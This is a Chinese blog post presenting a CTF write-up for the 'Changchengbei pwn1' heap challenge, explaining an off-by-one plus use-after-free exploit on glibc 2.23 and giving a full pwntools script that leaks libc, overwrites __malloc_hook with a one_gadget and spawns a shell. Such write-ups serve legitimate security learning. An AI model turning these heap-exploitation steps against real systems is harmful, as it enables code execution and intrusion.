长城杯pwn1

题目存在off by one 以及UAF漏洞

我们可以利用爆破

低字节修改到malloc-0x23

以及改变fastbin堆的fd指向unsortedbin堆

这样就能在下次申请的时候把这个unsortedbin拉进fastbin

我们只要改这个unsortedbin的fd指针就可以生效了,低字节修改到malloc-0x23。

再去利用off by one修改unsortedbin的大小为fastbin的大小

连续申请两次就可以在heaparry上得到libc的指针

接着再去把unsortedbin的fd改为0,bk改为__memalign_hook(在malloc-0x10上)

再去利用off by one 把unsortedbin大小复原

申请和unsortedbin大小一样的chunk去复原不然无法通过检测

最后利用onegadget打malloc_hook

利用

1
2
# malloc不符合onegadget触发条件
# malloc_printerr触发malloc_hook

最后double的时候即可触发啦

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
from pwn import *
import time
# context.log_level = 'debug'

local = 1
libc_path = '/home/q/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'
target = ''.split(':')
target_libc = ''
ogg = [0xf03a4,0xf1247]

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

def add(idx,size):
sa('>> \n','1')
sa('input index:\n',str(idx))
sa('input size:\n',str(size))

def edit(idx,con):
sa('>> \n','3')
sa('input index:\n',str(idx))
sla('input context:\n',con)

def free(idx):
sa('>> \n','2')
sa('input index:\n',str(idx))

if local:
p = process('./pwn')
libc = ELF(libc_path)
else:
p = remote(target[0],target[1])
libc = ELF(target_libc)

sa('>> \n','666')
base = int(rud('\n'),16)-libc.sym['printf']
malloc_hook = base+libc.sym['__malloc_hook']
m_hook = malloc_hook&0xff
success(hex(m_hook))

add(0,0x68)
add(1,0xe0)
add(2,0x60)
free(0)
free(2)
free(0)
free(1)
edit(1,'\xed\x1a')
#gdb.attach(p)
edit(0,'\x70\x80')
#gdb.attach(p)
add(3,0x68)#0 and 3
#gdb.attach(p)

edit(3,'a'*0x68+'\x71')
#gdb.attach(p)

add(4,0x68)#1 and 4
add(5,0x68)#malloc_hook-0x23
#gdb.attach(p)


edit(1,p64(0)+'\x00')
#gdb.attach(p)
edit(0,'a'*0x68+'\xf1')
#gdb.attach(p)
add(6,0xe0)
#gdb.attach(p)
one = (base+ogg[0])
pl = 'a'*19+p8(one&0xff)+p8((one>>8)&0xff)+p8((one>>16)&0xff)
edit(5,pl)
#gdb.attach(p)
free(0)
free(0)
shell()

  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2015-2022 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信